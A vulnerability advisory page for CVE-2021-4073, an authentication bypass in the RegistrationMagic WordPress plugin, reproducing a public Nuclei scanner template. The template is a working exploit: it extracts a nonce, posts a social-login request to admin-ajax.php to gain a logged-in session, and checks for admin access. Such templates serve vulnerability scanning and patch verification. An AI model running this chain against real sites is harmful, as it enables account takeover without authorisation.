CVE-2021-4073: RegistrationMagic <= 5.0.1.7 - Authentication Bypass

日期: 2025-12-12 | 影响软件: RegistrationMagic | POC: 已公开

漏洞描述

RegistrationMagic WordPress plugin versions <= 5.0.1.7 contain an authentication bypass caused by missing identity validation in social_login_using_email(), letting unauthenticated users log in as any site user, exploit requires knowing a valid username.

PoC代码[已公开]

id: CVE-2021-4073

info:
  name: RegistrationMagic <= 5.0.1.7 - Authentication Bypass
  author: daffainfo
  severity: critical
  description: |
    RegistrationMagic WordPress plugin versions <= 5.0.1.7 contain an authentication bypass caused by missing identity validation in social_login_using_email(), letting unauthenticated users log in as any site user, exploit requires knowing a valid username.
  impact: |
    Unauthenticated attackers can log in as any user, including administrators, potentially leading to full site compromise.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed.
  reference:
    - https://www.wordfence.com/blog/2021/12/authentication-bypass-vulnerability-patched-in-user-registration-plugin/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-4073
    - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-4073
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-4073
    cwe-id: CWE-287
    epss-score: 0.57717
    epss-percentile: 0.98096
    cpe: cpe:2.3:a:metagauss:registrationmagic:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: metagauss
    product: registrationmagic
    framework: wordpress
  tags: cve,cve2021,wordpress,wp,wp-plugin,metagauss,registrationmagic,auth-bypass,vkev

flow: |
  if (template.path != null) {
    http(1)
  }
  http(2)
  http(3)
  http(4)

variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - method: GET
    path:
      - "{{BaseURL}}{{path}}"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "handle_data(", "FB.login(")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - "handle_data.*'([0-9a-f]+)'\\);"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "\"request_processing\":", "\"security\":", "\"hours\":")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - '"security":"([0-9a-f]+)","hours"'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=rm_login_social_user&email={{email}}&security={{nonce}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "wordpress_logged_in_")'
          - 'contains_all(body, "\"code\":", "\"msg\":")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, '>Profile</div>', 'wp-admin-bar-root-default')"
          - 'status_code == 200'
        condition: and
# digest: 4b0a0048304602210083568b6fcafcd7eacd292d3819e10b84a8fa893966e9b27a7805d5c3aa8b95a0022100eeea2af8a218e50eac9ee345c01416f83a2fab16e9b2441819848b865b6bbac5:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-4073.yaml

相关漏洞推荐